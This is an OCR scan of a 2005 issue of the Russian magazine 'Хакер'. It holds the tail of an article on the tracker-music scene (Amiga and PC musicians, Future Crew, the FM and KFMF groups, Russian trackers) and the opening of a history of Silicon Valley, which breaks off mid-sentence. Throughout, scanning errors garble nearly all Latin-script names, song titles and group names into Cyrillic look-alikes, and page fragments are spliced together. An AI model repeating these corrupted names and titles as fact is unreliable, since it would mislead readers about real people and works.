оригинально и слушать его хотелось беско- 
нечно. РІазвания сэмплов и сообщения в 
своих модулях он писал исключительно заг- 
лавными буквами. 



Немцы ѴігдіІІ и без!ег специализировались на 
быстрой, энергичной музыке, отлично подхо- 
дившей для дем. ѴігдіІГовская «Іпіеііегепсе» 
стала одной из первых классических 
бетозіуіе-вещей, а безіег’овские «ЗІагбиз! 
Метогіез» и саундтрек к эпохальной «Воо!з» 
от Запііу (в двух частях, одна удивительнее 
другой) произвели что-то вроде маленькой ре- 
волюции на трекерной сцене. Пуристы, кстати, 
терпеть не могут без!ег'а. Говорят, что он, мол, 
слишком обычный, слишком танцевальный. В 
Германии еще жил МеІ-о-сІее/ЗГііпіпд, приду- 
мавший, за неимением нормальных сэмплов, 
собственный стиль для чип-тюнов и написав- 
ший несколько классических вещей этого жан- 
ра. Например «Тгаіпег». 

Существовала также итальянская версия 
ІМике/Мобу - РіІірреНо. Поляк Зсогрік позже 
станет одним из наиболее известных РС-тре- 
керщиков. Норвежец Эоп Са!о писал музыку 
вместе с Огоо. Не говоря уже о таких леген- 
дах сцены, как ІІпсІе Тот, Эезрег Куб, Вотео 
КпідИ!, французы МіпсІТиск и СІаѵѵг, англича- 
не ІІ4іа, бат & Зрооп, американец Зѵѵатр!ох, 
и... черт, я забыл 2-Рас'а из Германии, кото- 
рый писал обалденные чип-тюны на очень 
медленных ритмах, и еще СГіогиз & Зіб, пи- 
савших блюз и джаз, и, конечно, Щагбкіпд с 
его бозкрор-стилем, и 2обіак, и... 

Об амижной трекерной сцене можно говорить 
долго. Размах того, что устроил ТМе Шіта!е 
Зоипбігаскег, впечатляет. До сих пор число 
только зарелиженных .тоб'ов превышает 
число зарелиженных модулей всех остальных 
форматов, вместе взятых. Возможностью пи- 
сать музыку на домашнем компьютере безо 
всяких музыкальных инструментов воспользо- 
вался чуть ли не каждый, кто имел Атіда. 

А РІІТІІВЕ СВЕШ 

До выпуска в 1 993 году Зсгеат Тгаскег 3 от 
РиШге Сгеѵѵ трекерной сцены на РС не суще- 
ствовало. За эти слова меня наверняка будут 
бить всевозможные трекерщики, но если я 
сейчас начну рассказывать о всяких форма- 
тах вроде .669, .Нзс, абІіЬ-музыке и жалких 
попытках перенести .тоб на РС, меня будет 
бить редактор. Поэтому остановимся на том, 
что трекерная сцена на РС началась с релиза 
ЗТЗ. Это был продвинутый сиквел Зсгеат 
Тгаскег 2. Обе программы писал РЗІ из груп- 
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«ош эксперт» - 

ВСЁ О ТЕННИКЕ ДЛЯ 




$саѵеп Л Риіиге Сгеѵѵ 



пы РиШге Сгеѵѵ. Про эту легендарную коман- 
ду ты читал в предыдущем номере «Хакера», 
поэтому подробно рассказывать о ней не бу- 
ду. В РС было два музыканта: боппе «Ригріе 
Мойоп» ѴаКопеп и Реіег «Зкаѵеп» Нфа. Оба 
не имели никакого отношения к амижным 
традициям и начинали писать сразу в Зсгеат 
Тгаскег 2. Это важно, потому что многие 
амижные музыканты впоследствии перешли 
на РС, а мы говорим об истоках РС-сцены. 
Зкаѵеп'а любили решительно все. У него был 
очень оригинальный стиль, что-то наивное в 
структуре композиций и неповторимый, 
мощный звук, который затмевал мелочи вро- 
де грязных, шумящих сэмплов чистой энер- 
гией и потрясающими мелодиями. Флейты и 
энергичный бас в «Апшо паз», колокола и ре- 
жущие лиды в «Ісе Ргопііег», чистая синтетика 
в «Мегсигу Ваіп» и, конечно, грандиозная 
концовка «ЗесопсІ Аеаіііу» - космический ко- 
рабль на экране улетал в пространство под 
мелодию, которая была и остается одной из 
лучших в трекерной и коммерческой музыке. 
К сожалению, любовь к іпсіизігіаі дала о себе 
знать: когда Зкаѵеп после долгого затишья 
вернулся на трекерную сцену в конце 1 990-х, 
он писал жесткие, ритмичные вещи. Очень 
хорошо сделанные, но уже не так выделяю- 
щиеся и без тех самых мелодий, за которые 
его любили. Он и сейчас активно трекерит и 
пишет музыку для игр. 

Ригріе Мойоп в свое время считался богом тре- 
керной сцены. Его тизіссіізк'и «Эоигпеу 1» и 
«Эоигпеу 2» содержали в себе вещи, намного 
опередившие свое время. 

В 1 993 году этот музыкант писал Тгее \ш («Оау 
оі\Ье І_оІІірор»), который был лучше любого 
амижного модуля, и чип-тюны с сэмплами 
НеаШеаГа («ЗаІеІІйе Опе»), которые были едва 
ли не лучше чип-тюнов самого НеаШеаГа. Пер- 
вой зарелиженной им вещью была «РиШге 
Вгаіп», написанная для слайдшоу РС. После че- 
го в группу его взяли сразу же, даже не спра- 
шивая, согласен ли он. Вторая релизнугая ра- 
бота - саундтрек к «Шег», маленькой іпіго к 
предстоящему АззетЫу. Сценеры соглаша- 
лись, что вещь очень-очень красивая, что бас 



играет отличную мелодию, одну из лучших, ко- 
торую они слышали. Позже кто-то заметил, что 
все звуки в этом треке играются только в ле- 
вом канале. Но это не имело никакого значения 
- настолько хороша была музыка. С компози- 
цией «А ТоисМ оі Зргіпд» та же история. Боже- 
ственная мелодия, и только через много дней 
понимаешь, что сэмплы очень сильно шумят и 
что шум этот чуть ли не громче музыки. 

В середине 90-х РС начинали люто ненави- 
деть, ЗесопсІ Аеаіііу - называть глупой и пе- 
реоцененной демой, а Ригріе Мойоп'а - пе- 
реоцененным и «талантливым, но не нас- 
только» музыкантом. К концу 90-х многие 
были абсолютно уверены, что боппе никогда 
не писал ничего, кроме техно и музыки к де- 
мам, хотя у него был и Тгее \ш, и іаи-госк, 
и чип-тюны. Пресловутый джаз у него полу- 
чался сложнее Ѵіппіе'вских самых извращен- 
ных модулей, но элегантным, запоминаю- 
щимся и совсем не скучным, в отличие от 
всего того, что сделал Ѵіппіе. В 1995-1996 
годах Ригріе Мойоп написал свои последние 
трековые работы - для ОеаІІі ВаІІу, игры 
Аетебу Епіеііаіптепі - и после релиза игры 
окончательно ушел со сцены. 

Лживая музыка 

В 1 993 году американец ІМесгоз начал писать 
.МОО-ы и рассказывать остальным, как их 
писать, в своем журнале «Зідпаіз». Журнал 
был так себе, .МСЮ'ы - паршивенькими, 
особенно по сравнению с другими амижны- 
ми работами того времени, но к 1994 году 
уровень ІМесгоз’а вырос на порядок. А в 1 995 
году он организовал группу РМ и выпустил 
тизісбізк под названием «Ргодгеззіоп». Это 
был третий в истории трекерной сцены ре- 
лиз, опередивший свое время (первыми дву- 
мя были «боигпеу» 1 и 2). На диске была 
вовсе не синтетическая бетозіуіе-музыка 
типа «я хочу звучать, как Ригріе Мойоп», а 
две гитарные баллады («ТМе Сгоззіпд» и 
«СоІІаде»), «Меігоріех» - имитация живого 
джаз-выступления «Тбе Сгеу ІМоІе», теплый 
джаз с электропианино и органами а-ля 
Наттопб, и только одна работа, которую 
можно было бы назвать синтетической, - 
«Ізоіохіп», чем-то похожая на буйствовавший 
тогда в Европе коммерческий ЮМ. Живая 
музыка на трекере - ничего подобного на 
РС-сцене до этого не существовало, как, 
собственно, и техники, которую использовал 
ІМесгоз для живых партий саксофона в «ТМе 
Сігеу Моіе». Влияние «Ргодгеззіоп» на исто- 
рию трекерной музыки трудно переоценить. 
С тех пор музыканты на протяжении многих 
лет пытались - и иногда успешно - имитиро- 
вать живое звучание настоящей музыки. 
Группа, которая выпустила «Ргодгеззіоп», - 
РМ (сначала «Роиг Мизісіапз», потом «Ріѵе 
Мизісіапз») - была организована в 1995 году 
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Месгоз'ом и МеІІоѵѵЮ. В ряды РМ входили 
в разное время такие личности, как: 

Апсігеѵѵ «ІМесгоз» Зеда - к сказанному можно 
добавить, что в 1994-1996 годах он писал 
музыку для игр (Сгизасіег: N 0 Ветогзе, 
Сгизасіег: N 0 Ведгеі, Ігоп ЗеесІ, СІгеесІ), а в 
1 997 году выпустил еще один тизіссіізк 
«Зузіет», состоявший полностью из элект- 
ронных вещей. Некоторое время он трудился 
программистом сначала в Огідіп, потом в 
Оідііаі АпѵіІ и работал над сольным электрон- 
ным проектом «ТМе АІрМа Сопзрігасу». А сей- 
час участвует в другом музыкальном проекте 
под названием «Ігіз». 

Эап «ВазеМеасІ» Огапсірге - американец, один 
из немногих трекерщиков на РС, черпавших 
вдохновение от амижных музыкантов (0\щ, 
Аисііотопзіег и др.)- Он начинал еще на С64, 
а на РС писал по большей части околоэлект- 
ронную музыку и что-то вроде трекерной 
версии фанка. С ним был связан первый 
большой скандал на РС-сцене: в «СапЧ Раке 
Ше Рипк» ВазеНеасІ использовал длинные 
сэмплы мелодий, и, хотя он сделал это толь- 
ко для того, чтобы брать кусочки этих мело- 
дий и добавлять живой звук в музыку, его 
обвинили в плагиате. Баталии происходили 
на канале #1гах и в журнале ТгахѴѴеекІу, о ко- 
торых я еще упомяну. Поздний ВазеИеасІ пи- 
сал экспериментальный атЬіепі и тіпітаі 
Іесііпо, используя кучу студийного оборудо- 
вания. А после ухода со сцены получил му- 
зыкальное образование в Беркли. 

^акко «МеІІоѵѵЮ» Маппіпеп - финский музы- 
кант, пришедший с амижной сцены. У него, 
наверное, самая интересная эволюция сти- 
ля: старые модули - некое подобие норвежс- 



кого амижного стиля, шумноватое, техничес- 
ки не очень сложное, в то время как поздний 
МеІІоѵѵЮ писал экспериментальную электро- 
нику, подобной которой на сцене никогда не 
было. Он выпустил несколько тизіссіізк'ов 
такой электроники («Егтюйоп ВІиг», «ВІиг 
Огееп», «Оізк», последний - «Арреізар») и 
несколько саундтреков к разным демам. 
^ппе «Ригріе Мойоп» ѴаКопеп - про него мы 
уже все сказали; он действительно был чле- 
ном РМ, куда его пригласил, кажется, 
ВазеІіеасІ, но его выпнули (!!!) из группы, 
поскольку связи с ним не было никакой, к 
тому же он никогда не сделал ни одного ре- 
лиза под маркой РМ. 

^гоеп «ѴѴАѴЕ» Те! - очень известный музы- 
кант, начавший карьеру еще на С64, в част- 
ности писал музыку для игр. Каким-то мис- 
тическим способом попал в РМ и сделал там 
несколько релизов. Стиль ѴѴАѴЕ узнается 
сразу же, с первых нот - очень чистые сэмп- 
лы и в то же время механически звучащая 
музыка. Это не то чтобы плохо, к этой меха- 
нике быстро привыкаешь. Он писал все в 
своем особом стиле, который описать со- 
вершенно нереально; иногда с уклоном в 
электронику, иногда - в фанк. 

Напз «Ниш» ѵап ѴІіеІ - лучший мужской во- 
кал на трекерной сцене :) Тоже четкий, почти 
механический стиль, который нельзя опи- 
сать. Нипг зарелизил много разной музыки: 
от клубных вещей вроде «Роззит» и элект- 
роники «АсІсІ ТИеп ЗиМгасІ» до синтетическо- 
го фанка «СІопе И» и сіетозіуіе «Рготізе Ме». 
В его поздних вещах звучит уже упомянутый 
мужской вокал, к которому нужно привык- 
нуть, но это действительно сильный голос и 
единственный пример по-настоящему про- 
фессиональных модулей с вокалом. Звезд- 
ный час Нипг'а настал с выходом модуля 
«Ѵоіите», у которого нет аналогов ни в тре- 
керной, ни в современной коммерческой, ни 
в академической музыке. Виртуозная работа 
с вокалом и структурой. 

...И еще несколько человек: Зіаікег (своеоб- 
разный сіетозіуіе), Від Лт (то же и гитарные 
баллады), І_еѵіаІІіап (опять гитарные балла- 
ды), Ѵіс (эксперименты с клубной электрони- 
кой; помимо РМ, состоял еще и в Асте и 
приложил руку к созданию одной из лучших 
РС-дем - «303»). 

В 1 995 году случилось еще одно важное со- 
бытие: стартовал проект ТгахѴѴеекІу - ежене- 
дельный журнал, посвященный трекерной му- 
зыке. В ТѴѴ публиковалось все, относящееся к 
трекерам: реклама групп, обзоры последних 
релизов, советы начинающим трекерам, спо- 
ры типа «Использовать чужие сэмплы или 




нет?», а после релиза Ргодгеззіоп - «Реализм 
в трекерной музыке: возможно или нет?». К 
1 996 году у ТѴѴ была армия читателей, а у 
трекерной сцены - своя субкультура на ІВС- 
канале #1гах, где известные музыканты часа- 
ми болтали о трекерах, музыке и жизни вооб- 
ще. ТгахѴѴеекІу выходил вплоть до 1998 года. 

Л ОТ КМГ К СЕТЕВЫМ ПЕЙБПОИ 

В том же 1 995 году стали быстро развивать- 
ся трекерные группы КРМР (Козтіс Ргее 
Мизіс Роипбайоп) и ВВ (ВабісаІ ВИуІИтз). 

Обе специализировались на клубных стилях 
и танцевальной электронике, хотя КРМР 
иногда выпускала другую музыку. 

ВВ - малоизвестная широким сценическим 
массам команда, которая, тем не менее, 
придумала новый формат, ЮМР, и зарели- 
зила трекер Х-Тгаскег. КРМР - гораздо более 
известная группа, первая, посвященная 
именно музыке, хотя у них были и демы. Ее 
мемберами были Месгоз, 1_еѵіаШап и 
ВазеІіеасІ, а основной костяк состоял из 
Маеісит (основатель), СМиск ВізсиіТз, Мепіаі 
РІозз, КагІ (будущий Водбап Васгупзкі с 
лейбла ВерЫех) и Оопа. 

После того как КРМР, по выражению 
Мапѵѵе/ЗапбЗ, слегка испортились (к 1997- 
1 998 году их релизы были уже не так инте- 
ресны, как раньше), на сцене начали появ- 
ляться новые группы, посвященные исключи- 
тельно музыке: Токуо Оаѵѵп, І_еѵеІЮ, ТІіегаІйе. 
К 2000 году компы были уже повсюду и групп 
разрослось как грибов после дождя. Впосле- 
дствии многие из них образовывали пеі 
ІаЬеІз - что-то вроде звукозаписывающих 
лейблов, только некоммерческих и малоизве- 
стных. А когда пеі ІаЬеІз начали появляться 
вне сцены, граница между сценой и гшШте- 
сііа соттипііу окончательно стерлась. 

Л ПУТСПЙДЕРЫ 

Осталось рассказать про аутсайдеров запад- 
ной сцены. Таких было очень много на 
амижной сцене, больше, чем на РС. Напри- 
мер финская группа Огапде, делавшая нео- 
бычные, странные демы, которые не были 
похожи ни на что другое. Их музыкант Баззі 
«Оипе» №кко тоже делал необычную, стран- 
ную музыку. Писал он ее во второй половине 
девяностых, и в Европе такую музыку уже 
давно называли ЮМ. Но сцена это явление 
игнорировала, как и музыку Оипе. В конце 
90-х уже существовало что-то вроде культа 
этого человека - его называли пионером 
экспериментальной электроники на сцене. 
Оипе писал не только разные ломаные рит- 
мы с безумными мелодиями, но и мелодич- 
ные почти чип-тюны, и джаз. В Огапде также 
были СуЬеІіиз (асіф гг, рипк с закосом под 
1МОРХ), ЗиІрМиг (очень красивые трекерные 
вариации на тему джаза, вроде «ѴѴагЫе» или 
- самая известная - «Зоіі оТ.») и куча совер- 
шенно непонятных людей (99, Розітап-Раі), 
которые вроде бы писали музыку, а вроде 
бы и нет. Существовало мнение, что они 
виртуалы Оипе. 

Во времена РиШге Сгеѵѵ существовала груп- 
па, похожая на Огапде, - ЕМР. Ее мембера- 
ми было несколько музыкантов, из которых 
стоит отметить Ебде (знал Ригріе Мойоп'а и 
вместе с ним иногда писал музыку, получа- 
лись очень красивые вещи вроде «Ореп 
Зкіез») и Ргізт (опять трекерные вариации 
на тему джаза, очень интересные). 
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В Финляндии в 1995-1996 годах писал музы- 
ку ЕІѵѵоосІ. Его работы в основном были тан- 
цевальном и демлстиле, с пронзительными, 
быстрыми мелодиями. У ЕІѵѵоосІ 'а долгое 
время не было доступа в интернет, и модули 
его попали в Сеть благодаря Раде, еще од- 
ному финскому музыканту. Раде залил сразу 
несколько вещей (кажется, что-то в районе 
8-9), и появление ЕІѵѵоосГа было столь же 
неожиданным, как его исчезновение. Всего 
он зарелизил 15 модулей, из которых самый 
известный - «Вѵѵееі Эгеатз». ЕІѵѵоосГовский 
стиль и теплые мелодии надолго остались в 
памяти читателей ТгахѴѴеекІу. 

В 1 998 году из Испании начали появляться 
отличные модули от Ѵісіог «Аѵѵезоте» 

Ѵегдага. Стилистически он напоминал 
ЕІѵѵоосГа, но с большими амбициями, и му- 
зыка отдавала оркестровой направлен- 
ностью. Сейчас Аѵѵезоте помогает работать 
над Зкаіе Тгаскег’ом. В Польше в том же го- 
ду стал известным басек «Раісоп» Оо\т, пи- 
савший экспериментальную электронику с 
уклоном в йір-Ііор и боѵѵпіетро. Аѵѵезоте и 
Раісоп ничуть не стеснялись громадных по 
сценическим меркам размеров своих моду- 
лей, Аѵѵезоте с уважением отзывался о 
Ригріе Мойоп, Раісоп легко использовал в 
композициях здоровые куски из Віогк и 
Ѵапдеііз'а. Пожалуй, Аѵѵезоте и Раісоп были 
последними великими трекерщиками (они 
писали действительно потрясающие треки. 
Послушайте, например, трек «Созтіс оігі- 
ТІоѵѵ» от Раісоп. Такую музыку я могу слушать 
бесконечно. - Прим. тіпсІѵѵОгк). 

А ТРЕКЕРНОЯ М93ЫК0 В РОССИИ 

Российская трекерная сцена зародилась го- 
ду в 1995-м, с первых релизов бау Эее 
(клубная музыка) и самого первого 
тизіссіізк'а группы ЗапсІЗ. Если перепрыг- 
нуть через пару лет, то к 1 997 году обнару- 
жится уже несколько групп, занимающихся 
трекерной музыкой, из которых легко можно 
выделить одну - все ту же ЗапсІЗ. С течени- 
ем времени в ней так или иначе засветились 
практически все известные российские тре- 
керщики, среди которых: 

Александр «Мапѵѵе» Мачуговский - один из 
основателей ЗапсІЗ; с 1 995 года прошел путь 
от вещей сомнительной ценности из «Запсіз- 
95», написанных древними сэмплами 
Зкаѵеп'а и Ригріе Мойоп'а, до оригинальной, 
очень личной разновидности трекерной око- 
лоджазовой музыки. Прорывными компози- 
циями были «ѴѴаШпд Рог ^иIіа» и «Р.З.», пер- 
вая - беспокойная еіесігопіс зутрМопу, вто- 
рая получила высший балл на ныне покойном 
трекерном портале «Тгах Іп Зрасе». Послед- 
ние вещи - большей частью треки для игр, 
гладкие, с отшлифованным звуком и кучей 
деталей. В недавно вышедшей коллекции 
«МСЮезІ Оізк» зарелижены старые .МСЮ'ы: 
«Нарру ВігНпсІау, ХапаИ! », «ЗехиаІ Аддгеззіоп 
2» (обе - джаз и фанк в лучших амижных тра- 
дициях, маленькие, но очень милые). 

Филипп «Тапдегіпе» Барский - наверное, са- 
мый прозападный трекерщик среди российс- 
ких. У Тапдегіпе есть много амижных модулей 
- он был членом І_оокег Ноизе, известной 
амижной группы, участвовал в Мизіс 
СопІезТах и 20 Міпиіе конкурсах. В общем, 
его музыка лично для моих ушей звучит 
больше по-западному, чем по-русски. Как и 
Мапѵѵе, начинал с посредственных работ и 



прошел период странной музыки, созданной, 
по-видимому, сэмплами его Уатаііа РЗВ500. 
Поздний Тапдегіпе, года так с 1996-1997-го, 

- это много прекрасной, вдохновляющей му- 
зыки. Самый известный модуль этого перио- 
да - «Еагіу РаІІ», одна из самых красивых тре- 
керных вещей, когда-либо написанных в на- 
шей стране. Позже были «Нір-Нор ШІІаЬу» 

(не имеющая никакого отношения к Мр- 
Ііор'у), саундтрек к деме «ОѵегтіпсІ» группы 
Т-Вех (совершенно потрясающая вещь), «Тоу 
Зиттег» (один из десяти самых оригиналь- 
ных модулей всех времен) и ряд амижных 
треков, сделанных в 1999 и 2000 годах (к 
примеру, «Зепйтепіаі ѴѴіІсІегпезз»). 

Антон «Тгекз» Кудин - начал с трекерной реа- 
листичной музыки в очень известной Опсе Іп 
А Шейте, позже каким-то образом пришел к 
электронике около-атЬіепТной разновид- 
ности. Это ощущается в тизісбізк'е 
«АКегпайѵе Зеіесйоп» 99 года и работе «Сйу 
о\ Нипбгеб Моопз». В том же электронно- 
атЬіепТном направлении работает еще один 
музыкант ЗапсІЗ, Павел «ХапаМ» Яковлев. 
Помимо участников ЗапсІЗ, которых можно 
еще долго перечислять, нужно сказать о 
ЗІідМІу Мадіс. Лучшие мелодии на российс- 
кой сцене - его. Массивная и по-Зкаѵеп'овс- 
ки наивная «ВаІІ УдМпіпд», удивительно кра- 
сивая «Рогдойеп», которую зарелизили, по 
слухам, против воли автора, и «Каіеісіозсоре» 
в «7 Ѵеагз», с трогательным прозрачным соло 
на электрогитаре. ЗІідМІу Мадіс никогда не 
писал ничего экспериментального - в лучшем 
случае, что-нибудь более электронное, чем 
обычно. Обычно это была инструментальная 
трекерная поп-музыка, в которой были очень 
красивые мелодии и простая техника. 

Вкратце о некоторых других. Топе, АтдогЬ - 
оба из Т-Вех, одной из лучших российских де- 
мокоманд. Хрей - амижный трекерщик, боль- 
шей частью клубные стили. Красиво, чем-то 
напоминает КРМР образца 1995-го, только в 
.МОО'ах. Них - еще один музыкант Т-Вех, на- 



писавший безумно красивую «СМ Іп №е Род» и 
саундтрек к «ЗехиаІ Аддгеззіоп». Адепі Огапде - 
первый его трек - асіб-іаіі, потом - что-то нео- 
писуемое, но очень милое. Адепі Огапде вмес- 
те с Тапдегіпе разрабатывали первый сценерс- 
кий зойѵѵаге-синтезатор «Огапдаіог». Ѵапароо - 
сделал очень многообещающие вещи вроде 
«Розі» (1996), но потом куда-то пропал. Кееп - 
украинец, владеющий очень продвинутой тех- 
никой. Делал красивые вещи, но релизов у не- 
го было совсем мало. И совершенно непонят- 
но, где этот человек теперь. 

И конечно же, стоит упомянуть музыкантов 
НеІІгаізег Огоир (главным образом, Согрзе), ко- 
торые занимались тяжелой музыкой. 

А ПЕРСПЕКТИВЫ 

Старые трекеры сейчас потихоньку умирают, 
их заменили новые тосіиіаг-трекеры, начав- 
шиеся с Вии Тгаскег'а и закончившиеся 
Рзусіе'ом и Маб Тгаскег'ом. Но это уже не 
совсем трекеры, скорее, меганавороченные 
пакеты по созданию музыки. Сейчас сущест- 
вует огромное количество пеі ІаЬеІз, которые 
выпускают музыку в .трЗ. Часть этой музы- 
ки - трекерная, но уже другая, по сравнению 
с девяностыми. Старые легенды пишут му- 
зыку для игр, некоторые пытаются создавать 
собственные музыкальные проекты (Ригріе 
Мойоп, Месгоз), а некоторые отошли от му- 
зыки вообще. Из активных сейчас, пожалуй, 
только №дг и ѴМііиІа (оба когда-то были в 
Апаіодік, куда входил и наш Кееп). Есть еще 
Ѵііі - наверное, единственный из новых тре- 
керщиков, кто по-настоящему понимает, что 
такое трекер. Трекерная сцена смешалась с 
быстро выросшим за последние несколько 
лет тиШтебіа соттипйу, сценический ар- 
хив зсепе.огд теперь помогает Зоиізеек 
Ресогбз, старые трекерные группы стали пеі 
ІаЬеГами и выпускают в трЗ музыку как сво- 
их музыкантов, так и их друзей и знакомых. 
Старая сцена умерла, дав рождение новой 
музыкальной культуре. ЗС 
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ИСТОРИЯ КРЕМНИЕВОЙ ПОЛИНЫ 



ХПКЕР/№02(74)/2005 



1971 году в еженедельном издании ЕІесігопіс Кейз была опубликована серил статей Дона Хофпера о большом скоплении 
технологических компаний, сосредоточенных в округе Санта-Клара в 70 километрах от Сан-Франциско и развивающихся с 
поразительной быстротой. Иофпер назван место Кремниевой допиной. В течение следующих пет это название станет синонимом 
компьютерной Мекки, самого техногенного места на планете. 



Л 



А ПРОФЕССОР ТЕРИОН 

Ф редерик Эммонс Терман 
родился в небольшом 
американском городишке. 
В 1 0 лет он с семьей пе- 
реехал в Стэнфорд и 
быстро полюбил окрест- 
ные горы Санта-Круз. Он 
охотился на кроликов, ку- 
пался в озере Лагунита и мог целыми днями 
ловить рыбу. Отец преподавал в Стэнфор- 
дском университете - одном из лучших в 
стране, Фредерик был смышленым парень- 
ком, и родители могли не беспокоиться, что 




сын получит хорошее образование. Так и 
произошло - в Стэнфорде юный Терман по- 
лучил степень химика и инженера, после че- 
го поступил в Массачусетский технологичес- 
кий институт и в 1 924 году, в возрасте 24 
лет, стал доктором наук. Осенью он соби- 
рался поступить на работу в МТИ помощни- 
ком профессора, но неожиданная драма раз- 
рушила все планы. Во время визита к роди- 
телям в Поло-Альто он заболел туберкуле- 
зом и был вынужден весь следующий год 
провести в постели. Эффективных способов 
лечения этой болезни тогда не было, многие 
врачи считали, что он не выживет. 

Во время болезни Терман вернулся к своему 
старому увлечению радио. В 16 лет он собрал 
собственный приемник, через который связы- 
вался с другими пацанами из Техаса. Теперь 
же, лежа в постели, он читал технические до- 
кументации и книги вроде «Принципов радио- 
коммуникации». Поняв, что он, возможно, 
сможет улучшить эти принципы, Терман при- 
нялся писать собственную книгу, в которой 
поделился новыми идеями. Она была опубли- 
кована через несколько лет, в 1 932 году. 
Осенью 1 925 года, когда Фредерик немного 
поправился, его наставник и глава факульте- 
та электротехники профессор Гарри Джей 
Райн предложил работу в Стэнфорде на не- 



полный рабочий день - читать студентам 
лекции по радиоэлектронике. Терман, кото- 
рый провел весь год в четырех стенах, с ра- 
достью согласился. 

Фредерик Терман был настоящим трудоголи- 
ком и обладал поразительной способностью 
полностью концентрироваться на том, чем за- 
нимался. Проводя весь день в институте, он 
возвращался домой и продолжал работу над 
своими книгами. В 1927 году он стал ассис- 
тентом профессора, а в 1 937-м - профессо- 
ром и главой факультета электротехники. 
Тогда как раз началось время, которое вош- 
ло в историю США как период Великой деп- 
рессии. Для Стэнфордского университета 
настали не лучшие времена. Не было денег, 
не было инструментов и необходимой техни- 
ки. Не было даже возможности починить 
крышу, которая протекала во время дождей. 
Но хуже всего, по мнению Термана, было то, 
что одаренные студенты его института поки- 
дали родные места и отправлялись на вос- 
точное побережье, так как найти работу ря- 
дом было практически нереально. 

После войны ситуация изменилась в лучшую 
сторону. Терман заключил контракт с прави- 
тельством на разработку антирадарных сис- 
тем и обеспечил университету приличный 
приток средств. Министерство обороны ре- 



мировая кузница хай-ТЕка 
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гулярно заказывало и другие изделия Стэн- 
форда. Но чтобы восстановить университет и 
приобрести все необходимое оборудование, 
материалы, реагенты, этого было мало. Не- 
обходимо было найти способ заработать кучу 
денег. И Фредерик нашел такой способ. 

Л СТЭНФОРДСКИЙ ИССПЕДОВП 
ТЕПЬСКИИППРК 

Территория Стэнфорда охватывала 8 тысяч 
акров, здания университета при этом зани- 
мали лишь незначительную часть. Профессор 
Терман подумал и решил: а почему бы не 
сдать эти земли в аренду технологическим 
компаниям? По закону продавать их было 
нельзя, но долгосрочная аренда была для 
компаний не менее привлекательной. Сосед- 
ство ведущих производителей техники и уни- 
верситета было выгодным для обеих сторон. 
Первые получали ежегодно кучу талантливых, 
компетентных специалистов. Второй - отлич- 
ный источник финансирования. И конечно, 
большим аргументом для профессора было 
то, что так его студентам не придется искать 
достойную работу в чужих землях. Терман 
решил сдавать землю в аренду только 
действительно серьезным, технически прод- 
винутым компаниям. 

В 1951 году был подписан арендный дого- 
вор с Ѵагіап Аззосіаіез, и через два года 
компания заняла первое здание, построен- 
ное рядом с институтом. Следом за ней на 
территории Стэнфорда осели: Еазітап 
Косіак, СепегаІ ЕІесТгіс, РгеТогтесІ І_іпе 



Ргосіисіз, АбтігаІ Согрогайоп, ЗМоскІеу 
Тгапзізіог БаЬогакху о\ Весктап Іпзігитепіз, 
І_оскІіеесІ, НеѵѵІей-РаскагсІ и др. Этот клочок 
земли, на котором сосредоточились веду- 
щие технические исследования и разработ- 
ки, получил название Стэнфордский Иссле- 
довательский парк, а место в округе назы- 
вали Вау Агеа. 

Быстро развивающийся технопарк привлекал 
многих, кто работал с технологиями. В том 
числе крупнейшие в мире компании. ІВМ, в 
то время лидер по производству компьюте- 
ров, построила на прилегающей территории 
собственную исследовательскую лаборато- 
рию. Компания Хегох вложила большие день- 
ги в создание научного центра Раіо АКо 
Везеагсіі Сепіег (РАПС), который принес ми- 
ру много передовых разработок, включая 
первый персональный компьютер АІіоз. 
Правительство США, видя, насколько перс- 
пективны проходящие на территории Стэн- 
форда разработки, решило не оставаться в 
стороне и инвестировало большие суммы в 



текущие проекты. Среди них, к примеру, раз- 
работка операционной системы ІІпіх, диско- 
вых массивов ПАЮ и микропроцессорной ар- 
хитектуры ПІЗС. 

Терман очень хорошо относился ко своим 
студентам и всячески поощрял их на созда- 
ние собственных фирм в Вау Агеа. Многие 
оставались, продолжая проводить исследова- 
ния, только теперь уже в рамках не институ- 
та, а своих компаний. 

К началу 60-х Вау Агеа была уже цветущим 
местом, в котором работали лидеры по про- 
изводству компьютеров, полупроводников, 
лазеров, оптоволокна, роботов, медицинских 
инструментов и всевозможной электроники. 

Л РПСЦВЕТ КРЕМНИЕВОЙ ДОПИНЫ 

В 1947 году произошло событие, которое 
повлияло на всю дальнейшую историю, - 
изобретение транзистора. До этого для пе- 
реключателя тока использовались вакуум- 
ные трубы, которые были намного больше, 
генерировали больше тепла и были менее 
надежны. Авторами изобретения были Виль- 
ям Шокли, Джон Барден и Уолтер Бретейн. 

В 1955 году Вильям Шокли оставил ВеІІ ЬаЬз 
и основал собственную компанию по произ- 
водству полупроводников. Шокли пригласил 
восьмерых лучших ученых восточного побе- 
режья, и все вместе они создали сильней- 
шую команду электронных гениев. Впрочем, 
продолжалось это недолго. Вильям хотел 
производить четырехслойные диоды, в то 
время как его коллеги настаивали на разра- 
ботке кремниевых транзисторов. Компро- 
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аЕГЕНца огороже 

В Кремниевое долине есть байка о том, как на самом деле все 
началось. Одной из первых компаний, которая поселилась на 
территории Стэнфорда, была НеѵѵІеМ-РаскагсІ, созданная двумя 
талантливыми студентами Биллом Хьюлиттом и Дэвидом Пак- 
кардом. Во время учебы в Стэнфорде профессор Терман пред- 
ложил им вместе поработать над проектом, целью которого бы- 
ло сконструировать новый осциллограф. Собирали его ребята в 
гараже, а когда работа была закончена, стало ясно, что осцил- 
лограф Хьюлитта и Паккарда намного превосходит по рента- 
бельности и эффективности имеющиеся на рынке. Терман одол- 
жил ребятам денег на раскрутку и посоветовал продать новое из- 
делие. Первым покупателем стала студия Уолта Диснея, которая 
использовала 8 новых аудиоосциллографов для создания мульт- 
фильма «Фантазия». Вырученные деньги пошли на создание 
компании, которая специализировалась на производстве высо- 
кокачественных революционных инструментов для инженеров и 
ученых. Когда через пять лет в 1942 году компания разрослась и 
ее штат составлял 60 работников, а денежный оборот - миллион 
долларов в год, пришло время расширяться. И из гаражной ком- 
пании НР превратилась в крупнейшую компанию новорожденной 
Кремниевой долины. Подвиг двух друзей пытались повторить 
многие, и многим это удавалось. Кремниевая долина стала мес- 
том, где никому не известные ученые и инженеры могли заявить 
о себе на весь мир. Местом, где мечты могли стать реальностью. 
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мисс найти не удалось, и сотрудники оста- 
вили компанию, чтобы основать свою. Че- 
рез несколько месяцев Шокли пришлось 
свернуть все то, над чем он работал, так 
как без поддержки талантливых ученых про- 
должать не было смысла. Понятное дело, 
